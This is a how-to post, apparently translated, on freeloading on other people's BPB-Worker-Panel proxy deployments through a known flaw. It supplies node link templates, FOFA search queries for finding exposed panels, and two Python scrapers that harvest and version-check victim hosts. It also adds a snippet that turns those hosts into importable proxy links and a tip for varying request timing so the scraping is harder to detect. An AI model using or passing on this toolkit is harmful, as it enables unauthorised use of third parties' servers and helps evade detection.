Description

These free proxy nodes come mainly from exploiting a vulnerability in the BPB-Worker-Panel. The flaw was actually disclosed long ago, and people have even posted videos on how to plug it, but in a later update the author added a new hole. According to the author, leaking doesn't matter, which means plenty of nodes are free to use. Time to take off.

Preparation

V2ray client: [download link]
V2ray-Pro client: [download link]

Code:

Trojan node:
trojan://bpb-trojan@visa.cn:443?security=tls&sni=YOUR-DOMAIN&type=ws&host=YOUR-DOMAIN&path=%2Ftr%3Fed%3D2560#BPB好人

VLESS node:
vless://89b3cbba-e6ac-485a-9481-976a0415eab9@visa.cn:443?encryption=none&security=tls&sni=YOUR-DOMAIN&type=ws&host=YOUR-DOMAIN&path=%3Fed%3D2560#BPB好人

noTLS VLESS node:
vless://89b3cbba-e6ac-485a-9481-976a0415eab9@visa.cn:80?encryption=none&security=none&type=ws&host=YOUR-DOMAIN&path=%3Fed%3D2560#BPB好人
  1. Batch-fetch BPB panel backend addresses for free:
    Port 443: [click to fetch]

    443 search query: icon_hash="-1354027319" && asn="13335" && port="443"

    Port 80: [click to fetch]

    80 search query: icon_hash="-1354027319" && asn="13335" && port="80"

    This yields BPB-Worker-Panel addresses; append /login to each one to reach the panel's login backend. The panel version must be 2.5.3 or higher for its nodes to be importable.

  2. Open your proxy client and paste in the node links prepared above.
    (screenshot: copy and paste)

  3. Select the node you just added, click Edit, and paste the address obtained in step 1 into both the disguise domain (host) and the SNI field. A minimal sketch of this substitution follows this list.

    If you are using port 80, no SNI is needed; just change transport layer security (TLS) to none.

    (screenshot: v2ray node editing)
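
The substitution in step 3 is mechanical, so here is a minimal Python sketch of it. The host value is a hypothetical placeholder; substitute an address obtained in step 1. The UUID, server, and path come from the templates above.

# A hypothetical host taken from the step-1 FOFA results.
host = "example.workers.dev"

# Port 443: the domain goes into both sni and host.
vless_443 = (
    "vless://89b3cbba-e6ac-485a-9481-976a0415eab9@visa.cn:443"
    f"?encryption=none&security=tls&sni={host}&type=ws&host={host}"
    "&path=%3Fed%3D2560#BPB好人"
)

# Port 80: no sni parameter, and security=none instead of tls.
vless_80 = (
    "vless://89b3cbba-e6ac-485a-9481-976a0415eab9@visa.cn:80"
    f"?encryption=none&security=none&type=ws&host={host}"
    "&path=%3Fed%3D2560#BPB好人"
)

print(vless_443)
print(vless_80)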

Advanced

Here is a Python script built by the well-known 零度 that fetches usable addresses directly.

  1. Install Python. The installation itself isn't covered here; look up the details yourself if needed.

  2. Install the required dependencies:

    pip install requests beautifulsoup4
    pip install selenium

    Note: if installation fails, your Python/pip version may be too old; try the following command instead.

    pip install selenium requests beautifulsoup4 packaging
  3. Save the code below as a file named vpn.py.

    When you run python E:\Documents\index\py\vpn.py from a terminal in your own folder, the output files would otherwise land in C:\Windows\System32. The code below is therefore tweaked slightly: the output files are saved in the same folder as the script, and the https:// prefix and /login suffix are stripped from the saved URLs.

    import os
    import requests
    from bs4 import BeautifulSoup
    from packaging import version

    # Directory containing this script
    CURRENT_DIR = os.path.dirname(os.path.abspath(__file__))

    # Full paths of the output files
    OUTPUT_FILE_1 = os.path.join(CURRENT_DIR, "1.txt")
    OUTPUT_FILE_2 = os.path.join(CURRENT_DIR, "2.txt")
    OUTPUT_FILE_OK = os.path.join(CURRENT_DIR, "OK.txt")

    HEADERS = {
        "User-Agent": (
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
            "AppleWebKit/537.36 (KHTML, like Gecko) "
            "Chrome/115.0.0.0 Safari/537.36"
        )
    }
    MIN_VERSION = version.parse("2.5.3")  # minimum panel version


    def fetch_fofa_results():
        """Fetch the FOFA results page and extract the result URLs."""
        try:
            print("Fetching FOFA results...")
            response = requests.get(
                "https://fofa.info/result?qbase64=aWNvbl9oYXNoPSItMTM1NDAyNzMxOSIgJiYgYXNuPSIxMzMzNSIgJiYgcG9ydD0iNDQzIg%3D%3D",
                timeout=10
            )
            response.raise_for_status()
        except requests.RequestException as e:
            print(f"Error fetching FOFA results: {e}")
            return []

        soup = BeautifulSoup(response.text, 'html.parser')
        results = [link['href'] for link in soup.find_all('a', href=True) if link['href'].startswith("https://")]
        print(f"Found {len(results)} URLs.")
        return results


    def strip_https_and_login(input_file, output_file):
        """Remove the https:// prefix and the /login suffix."""
        try:
            with open(input_file, "r", encoding="utf-8") as infile, \
                    open(output_file, "w", encoding="utf-8") as outfile:
                for line in infile:
                    url = line.strip()
                    # Drop https:// and /login
                    if url.startswith("https://"):
                        url = url[8:]  # strip https://
                    if url.endswith("/login"):
                        url = url[:-6]  # strip /login
                    outfile.write(f"{url}\n")
            print(f"Processed URLs saved to {output_file}.")
        except IOError as e:
            print(f"Error processing file: {e}")


    def validate_bpb_version(input_file, output_file):
        """Validate the BPB Panel version."""
        try:
            with open(input_file, "r", encoding="utf-8") as infile, \
                    open(output_file, "w", encoding="utf-8") as outfile:
                for url in infile:
                    url = url.strip()
                    try:
                        response = requests.get(f"https://{url}/login", headers=HEADERS, timeout=10)
                        response.raise_for_status()

                        raw_version = extract_version(response.text)
                        if raw_version and version.parse(raw_version) > MIN_VERSION:
                            print(f"[Valid] {url} (Version: {raw_version})")
                            outfile.write(f"{url}\n")
                    except Exception as e:
                        print(f"[Error] Could not process {url}: {e}")
            print(f"Validated URLs saved to {output_file}.")
        except IOError as e:
            print(f"Error reading/writing file: {e}")


    def extract_version(html):
        """Extract the version number from the HTML."""
        if "BPB Panel" in html:
            start_index = html.find("BPB Panel")
            version_start = html.find("2", start_index)
            if version_start == -1:
                return None
            version_end = version_start
            while version_end < len(html) and (html[version_end].isdigit() or html[version_end] == "."):
                version_end += 1
            return html[version_start:version_end]
        return None


    def main():
        # Step 1: fetch the FOFA results page
        urls = fetch_fofa_results()
        if not urls:
            print("No URLs fetched. Exiting.")
            return

        with open(OUTPUT_FILE_1, "w", encoding="utf-8") as file:
            file.writelines(f"{url}\n" for url in urls)
        print(f"Fetched results saved to {OUTPUT_FILE_1}.")

        # Step 2: strip https:// and /login
        strip_https_and_login(OUTPUT_FILE_1, OUTPUT_FILE_2)

        # Step 3: validate BPB Panel versions; matches go to OK.txt
        validate_bpb_version(OUTPUT_FILE_2, OUTPUT_FILE_OK)


    if __name__ == "__main__":
        main()
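
Once OK.txt is populated, its hosts can be dropped straight into the node templates from the preparation section. A minimal sketch, assuming the file layout produced by the script above (one bare host per line):

import os

BASE_DIR = os.path.dirname(os.path.abspath(__file__))

# VLESS template from the preparation section, with the host left open.
TEMPLATE = (
    "vless://89b3cbba-e6ac-485a-9481-976a0415eab9@visa.cn:443"
    "?encryption=none&security=tls&sni={host}&type=ws&host={host}"
    "&path=%3Fed%3D2560#BPB好人"
)

# Emit one importable link per validated host in OK.txt.
with open(os.path.join(BASE_DIR, "OK.txt"), encoding="utf-8") as f:
    for line in f:
        host = line.strip()
        if host:
            print(TEMPLATE.format(host=host))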

Paginated fetching

Note: paginated fetching can be detected by the site, so use it with caution (see the sketch after the script for one way to make the request pattern less regular).

import os
import requests
from selenium import webdriver
from selenium.webdriver.common.by import By
from packaging import version
import time
from bs4 import BeautifulSoup

# Resolve the directory containing this script at runtime
BASE_DIR = os.path.dirname(os.path.abspath(__file__))

# Output files, saved in the script's directory
OUTPUT_FILE_1 = os.path.join(BASE_DIR, "1.txt")
OUTPUT_FILE_2 = os.path.join(BASE_DIR, "2.txt")
OUTPUT_FILE_OK = os.path.join(BASE_DIR, "OK.txt")

BASE_URL = "https://fofa.info/result?qbase64=aWNvbl9oYXNoPSItMTM1NDAyNzMxOSIgJiYgYXNuPSIxMzMzNSIgJiYgcG9ydD0iNDQzIg%3D%3D"
HEADERS = {
    "User-Agent": (
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
        "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
    )
}
MIN_VERSION = version.parse("2.5.3")


def init_browser():
    """Initialize the Selenium browser."""
    options = webdriver.ChromeOptions()
    options.add_argument("--headless")  # headless mode
    options.add_argument("--disable-gpu")
    options.add_argument("--no-sandbox")
    options.add_argument("--disable-dev-shm-usage")
    return webdriver.Chrome(options=options)


def fetch_fofa_results(start_page, end_page):
    """Fetch FOFA pages with Selenium and extract the result URLs."""
    print(f"Fetching FOFA pages {start_page} through {end_page}...")
    results = set()
    driver = init_browser()

    try:
        for page in range(start_page, end_page + 1):
            print(f"Fetching page {page}...")
            driver.get(f"{BASE_URL}&page={page}")
            time.sleep(2)  # wait for the page to load

            # Collect the links
            elements = driver.find_elements(By.CSS_SELECTOR, "a[href^='https://']")
            for elem in elements:
                url = elem.get_attribute("href")
                results.add(url)

    except Exception as e:
        print(f"Error while fetching pages: {e}")
    finally:
        driver.quit()

    print(f"Extracted {len(results)} addresses in total")
    return list(results)


def save_urls_to_file(urls, file_path):
    """Save a list of URLs to a file."""
    try:
        with open(file_path, "w", encoding="utf-8") as file:
            file.writelines(f"{url}\n" for url in urls)
        print(f"Results saved to {file_path}")
    except IOError as e:
        print(f"Failed to save file: {e}")


def append_login_to_urls(input_file, output_file):
    """Append /login to each URL."""
    print(f"Processing {input_file}, appending /login...")
    try:
        with open(input_file, "r", encoding="utf-8") as infile, \
                open(output_file, "w", encoding="utf-8") as outfile:
            for line in infile:
                url = line.strip()
                outfile.write(f"{url}/login\n")
        print(f"Done; results saved to {output_file}")
    except IOError as e:
        print(f"Failed to process file: {e}")


def validate_bpb_version(input_file, output_file):
    """Check the BPB Panel version number."""
    print(f"Checking BPB Panel versions in {input_file}...")
    try:
        with open(input_file, "r", encoding="utf-8") as infile, \
                open(output_file, "w", encoding="utf-8") as outfile:
            for line in infile:
                url = line.strip()
                try:
                    response = requests.get(url, headers=HEADERS, timeout=10)
                    if response.status_code == 200 and "BPB Panel" in response.text:
                        raw_version = extract_version(response.text)
                        if raw_version and version.parse(raw_version) > MIN_VERSION:
                            print(f"[Valid] {url} (version: {raw_version})")
                            outfile.write(f"{url}\n")
                except requests.RequestException as e:
                    print(f"[Error] Could not reach {url}: {e}")
    except IOError as e:
        print(f"Failed to read/write file: {e}")


def extract_version(html):
    """Extract the version number from the HTML."""
    soup = BeautifulSoup(html, "html.parser")
    panel_text = soup.find(string="BPB Panel")
    if panel_text:
        next_text = panel_text.find_next(string=True)
        if next_text:
            candidate = next_text.strip()
            if candidate and candidate[0].isdigit():
                return candidate
    return None


def main():
    # Pagination settings
    start_page = 1
    end_page = 3

    # Step 1: fetch the FOFA pages
    urls = fetch_fofa_results(start_page, end_page)
    if urls:
        save_urls_to_file(urls, OUTPUT_FILE_1)

    # Step 2: append /login
    append_login_to_urls(OUTPUT_FILE_1, OUTPUT_FILE_2)

    # Step 3: check the version numbers
    validate_bpb_version(OUTPUT_FILE_2, OUTPUT_FILE_OK)


if __name__ == "__main__":
    main()
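
On the detection warning above: the fixed time.sleep(2) between pages gives the scraper a very regular fingerprint. One mitigation, an assumption on my part rather than part of the original script, is to randomize the delay:

import random
import time

def polite_pause(min_s=2.0, max_s=6.0):
    """Sleep a random interval so page requests arrive at irregular times."""
    time.sleep(random.uniform(min_s, max_s))

# Hypothetical usage inside fetch_fofa_results(), replacing time.sleep(2):
#     driver.get(f"{BASE_URL}&page={page}")
#     polite_pause()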